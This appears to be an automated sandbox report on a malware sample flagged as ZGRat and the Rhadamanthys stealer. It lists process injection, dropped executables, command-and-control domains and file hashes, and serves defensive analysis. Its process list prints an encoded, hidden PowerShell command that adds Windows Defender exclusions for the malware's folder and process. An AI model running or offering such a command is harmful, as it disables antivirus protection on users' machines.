memory/3016-5128-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

memory/3016-5129-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5131-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

memory/3016-5132-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5130-0x0000000001000000-0x0000000001008000-memory.dmp

memory/3016-5133-0x0000000001020000-0x00000000010A0000-memory.dmp

memory/3016-5134-0x000007FEF5520000-0x000007FEF5EBD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-12 08:08

Reported

2024-02-12 08:11

Platform

win10v2004-20231222-en

Max time kernel

89s

Max time network

149s

Command Line

sihost.exe

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3204 created 2520 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\system32\sihost.exe
PID 3808 created 2520 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Windows\system32\sihost.exe

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4416 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 4416 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 4416 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 4416 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe
PID 3784 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3784 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3784 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 4888 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 4888 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 4888 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 3204 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 2336 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3204 -ip 3204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3204 -ip 3204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 444

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3808 -ip 3808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3808 -ip 3808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 444

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 hubvera.ac.ug udp
RU 91.215.85.223:80 hubvera.ac.ug tcp
US 8.8.8.8:53 ddlakava.ac.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 223.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 rebrand.ly udp
US 15.197.137.111:80 rebrand.ly tcp
US 8.8.8.8:53 fran.ac.ug udp
US 8.8.8.8:53 fransceysse.ac.ug udp
US 8.8.8.8:53 tinyurl.com udp
US 104.20.139.65:80 tinyurl.com tcp
US 8.8.8.8:53 kode.ac.ug udp
US 8.8.8.8:53 kodekode.ac.ug udp
US 8.8.8.8:53 tuekisa.ac.ug udp
US 8.8.8.8:53 partadino.ac.ug udp
RU 91.215.85.223:80 partadino.ac.ug tcp
US 8.8.8.8:53 111.137.197.15.in-addr.arpa udp
US 8.8.8.8:53 65.139.20.104.in-addr.arpa udp
US 8.8.8.8:53 markinda.xyz udp
US 8.8.8.8:53 markinda.top udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 nickshort.ug udp
US 8.8.8.8:53 kodedea.ug udp
US 8.8.8.8:53 junks.ac.ug udp
US 8.8.8.8:53 ugas.ug udp
US 8.8.8.8:53 fillah.ac.ug udp
US 8.8.8.8:53 nickshort.ug udp
US 8.8.8.8:53 kodedea.ug udp
US 8.8.8.8:53 junks.ac.ug udp
US 8.8.8.8:53 ugas.ug udp
US 8.8.8.8:53 fillah.ac.ug udp
US 8.8.8.8:53 nickshort.ug udp
US 8.8.8.8:53 kodedea.ug udp
US 8.8.8.8:53 junks.ac.ug udp
US 8.8.8.8:53 movescx.top udp
US 8.8.8.8:53 ugas.ug udp
US 8.8.8.8:53 cointra.ac.ug udp
US 8.8.8.8:53 muylove.ac.ug udp
US 8.8.8.8:53 fillah.ac.ug udp
US 8.8.8.8:53 partiad.top udp
US 8.8.8.8:53 partiad.xyz udp

Files

memory/4416-0-0x0000000000400000-0x0000000000427000-memory.dmp

memory/4416-4-0x00000000021D0000-0x00000000021D1000-memory.dmp

memory/4416-3-0x0000000077942000-0x0000000077943000-memory.dmp

memory/4416-5-0x0000000000400000-0x0000000000427000-memory.dmp

memory/3784-6-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3784-8-0x0000000000400000-0x000000000040A000-memory.dmp

memory/4416-9-0x0000000000400000-0x0000000000427000-memory.dmp

memory/3784-12-0x0000000077942000-0x0000000077943000-memory.dmp

memory/4416-10-0x00000000021E0000-0x00000000021E8000-memory.dmp

memory/3784-13-0x0000000000590000-0x0000000000591000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 bb6f1485ca9bb99bf53960b9d1b327c3
SHA1 d8dbfb7c389d34d5dbc717e123e7ffa33db047fa
SHA256 53b4a8f6537f5efb5ce99b96a72577e214dfef4e7a6804be88fc38ceaa91e5de
SHA512 c46b65d9c307f39d76743a6d5e392663152823d43cf6f59ac04fad69af30636268a8be0b1e11f684d1c33813ed92a29efb1a97480436330747eded4f2ee566e6

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 3fe26e4272ee9079eca25927f8fede41
SHA1 08accd9b1eb94f62679adf32dccf9a48f3d65d62
SHA256 f4354f6ba4d415bbe0a2911b9706000da0ec9619c5a97a0f31b3055f05499c1a
SHA512 6ea25e86de9fa219dc835d06e7421c33231177df6340af60feafbcf56c032130287f67bb322ff8e3065872cec1a15fc8dad0d8fcea83ccd2fda5326f8d4f7b57

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 aecb18a3caeeac76925892c67314fedb
SHA1 9a883cdaff6a5d33add9bb4ffea78f5faef9b9a8
SHA256 2725c0ccb3490383cfde1baac41dec628d2008be21a66066d2d372bcc4280d25
SHA512 dad6af9f6417f92b896592a083c1e8c41458deba52b8d3a96c717cb73fe0e211b2b7d6ef64a50b13a342a0a7bee4e89b65401ae1fe1b05e8bce323de405bb9fa

memory/4888-31-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/4888-30-0x0000000000E70000-0x0000000001098000-memory.dmp

memory/4888-32-0x0000000005AA0000-0x0000000005CA8000-memory.dmp

memory/4888-34-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-33-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-36-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-38-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-44-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-46-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-42-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-48-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-52-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-54-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-50-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-40-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-56-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-60-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-66-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-64-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-62-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-58-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-68-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-72-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-70-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-76-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-80-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-82-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-86-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-88-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-90-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-84-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-78-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-74-0x0000000005AA0000-0x0000000005CA3000-memory.dmp

memory/4888-966-0x0000000001A60000-0x0000000001A61000-memory.dmp

memory/4888-965-0x0000000005A90000-0x0000000005AA0000-memory.dmp

memory/4888-968-0x0000000005E50000-0x0000000005E9C000-memory.dmp

memory/4888-967-0x0000000005CB0000-0x0000000005E50000-memory.dmp

memory/4888-981-0x0000000008230000-0x00000000087D4000-memory.dmp

memory/2336-980-0x0000000000B90000-0x0000000000CD0000-memory.dmp

memory/2336-985-0x0000000005530000-0x0000000005540000-memory.dmp

memory/4888-991-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/3204-995-0x0000000000400000-0x0000000000488000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 4268e4dff85cfe28241b316059d4e62d
SHA1 d4485914e31cb7a744219daa4d20da84b5041496
SHA256 6875f91d0de394779e082729fd267e458a83d1616ccf8c8f875aaf919d53fa3c
